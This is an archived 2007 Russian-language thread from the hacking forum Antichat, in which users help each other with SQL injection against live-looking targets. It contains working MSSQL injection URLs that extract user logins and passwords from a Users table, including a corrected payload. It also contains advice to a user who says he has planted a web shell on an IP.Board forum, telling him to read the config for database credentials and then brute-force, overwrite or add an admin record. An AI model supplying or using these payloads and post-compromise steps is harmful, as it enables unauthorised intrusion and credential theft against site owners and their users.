ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.11.2007, 13:49
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Сообщение от ShAnKaR
в mysql по секурным соображениям нельзя так, вобщем выше написано.
что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
|
|
|
25.11.2007, 13:55
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
что, UPDATE никак не получится корректно поставить в запрос?
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
|
|
|
|
26.11.2007, 00:48
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Код:
.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-
получаю
Microsoft OLE DB Provider for SQL Server error '80040e21'
Line 1: Incorrect syntax near 'cast'.
Что не так? |
|
|
|
26.11.2007, 01:25
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от fervex
что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
не получится ибо в подзапросах тока select и после union тоже тока select
Сообщение от 0nep@t0p
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.
__________________
|
|
|
|
26.11.2007, 01:42
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от delay(0)
Код:
.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-
получаю
Что не так? .
Код:
asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)--
непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 26.11.2007 в 14:04..
|
|
|
|
26.11.2007, 11:03
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
если захотел как суперхеккер сделать
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
|
|
|
|
26.11.2007, 11:26
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз
|
|
|
|
26.11.2007, 11:36
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
смотришь когфиг, там пасс, юзер и адрес от БД.
Заходишь в эту бд. Смотришь таблтцу с юзверями
Ищешь админа - брутишь хэш.
Меньше мороки - просто меняешь хэш
А лучше - вставить новую запись
|
|
|
|
26.11.2007, 11:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами
|
|
|
|
26.11.2007, 13:16
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от delay(0)
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
Код:
asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--
ну как то так
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
